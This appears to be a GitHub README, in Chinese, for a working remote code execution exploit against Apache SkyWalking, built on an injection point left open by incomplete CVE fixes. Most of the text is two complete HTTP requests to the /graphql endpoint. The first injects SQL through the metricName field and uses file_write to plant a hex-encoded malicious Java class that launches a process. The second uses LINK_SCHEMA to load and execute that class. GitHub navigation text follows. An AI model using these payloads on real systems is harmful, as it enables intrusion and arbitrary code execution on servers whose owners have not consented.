SkywalkingRCE-vul

Skywalking远程代码执行漏洞，为CVE-2020-9483、CVE-2020-13921修复不完善遗留注入点，可被进一步了利用执行代码。

漏洞地址： https://github.com/apache/skywalking/pull/6246/files

https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw

环境

Skywalking测试环境JDK1.8，恶意类为JDK1.7编译。

写入恶意类文件

将恶意类编译并转为十六进制数据，为file_write方法的第一个参数赋值，第二个参数为class文件名。

恶意类EvilClass.java 和转十六进制工具代码ToHexTools.java 均在项目中。

执行 ToHexTools.java 会将 EvilClass.class 文件内容转码为十六进制形式，输出为 file.hex 文件。

POST /graphql HTTP/1.1
Host: 192.168.18.240:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 2152
Origin: http://192.168.18.240:8080
Connection: close
Referer: http://192.168.18.240:8080/log

{
 		"query": "query queryLogs($condition: LogQueryCondition) {
        logs: queryLogs(condition: $condition) {
            data: logs {
                serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
            }
            total
        }
    }",
    "variables": {
        "condition": {
						"metricName": "INFORMATION_SCHEMA.USERS union  all select file_write('cafebabe0000003100280a000800190a001a001b08001c0a001a001d07001e0a0005001f0700200700210100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000b4c4576696c436c6173733b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b2956010004617267730100135b4c6a6176612f6c616e672f537472696e673b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000a536f7572636546696c6501000e4576696c436c6173732e6a6176610c0009000a0700220c0023002401000463616c630c002500260100136a6176612f696f2f494f457863657074696f6e0c0027000a0100094576696c436c6173730100106a6176612f6c616e672f4f626a6563740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000300010009000a0001000b0000002f00010001000000052ab70001b100000002000c00000006000100000005000d0000000c000100000005000e000f00000009001000110001000b0000002b0000000100000001b100000002000c00000006000100000010000d0000000c00010000000100120013000000080014000a0001000b000000540002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050002000c000000160005000000080009000b000c0009000d000a0011000c000d0000000c0001000d000400150016000000010017000000020018','EvilClass.class'))a where 1=? or 1=? or 1=? --",
						"endpointId":"1",
   					"traceId":"1",
   					"state":"ALL",
   					"stateCode":"1",
   					"paging":{
	    				"pageNum": 1,
	    				"pageSize": 1,
	    				"needTotal": true
   				}
        }
    }
}

成功写入EvilClass.class文件。

加载执行恶意类

LINK_SCHEMA 的第二个参数值为要加载的文件名。

POST /graphql HTTP/1.1
Host: 192.168.18.240:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 791
Origin: http://192.168.18.240:8080
Connection: close
Referer: http://192.168.18.240:8080/log

{
 		"query": "query queryLogs($condition: LogQueryCondition) {
        logs: queryLogs(condition: $condition) {
            data: logs {
                serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
            }
            total
        }
    }",
    "variables": {
        "condition": {
						"metricName": "INFORMATION_SCHEMA.USERS union  all select LINK_SCHEMA('TEST2','EvilClass','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --",
						"endpointId":"1",
   					"traceId":"1",
   					"state":"ALL",
   					"stateCode":"1",
   					"paging":{
	    				"pageNum": 1,
	    				"pageSize": 1,
	    				"needTotal": true
   				}
        }
    }
}

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
SkywalkingRCE-vul		SkywalkingRCE-vul
img		img
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SkywalkingRCE-vul

SkywalkingRCE-vul

img

img

README.md

README.md

Repository files navigation

SkywalkingRCE-vul

环境

写入恶意类文件

加载执行恶意类

About

Releases

Packages

Languages

Veraxy00/SkywalkingRCE-vul

Folders and files

Latest commit

History

Repository files navigation

SkywalkingRCE-vul

环境

写入恶意类文件

加载执行恶意类

About

Resources

Stars

Watchers

Forks

Languages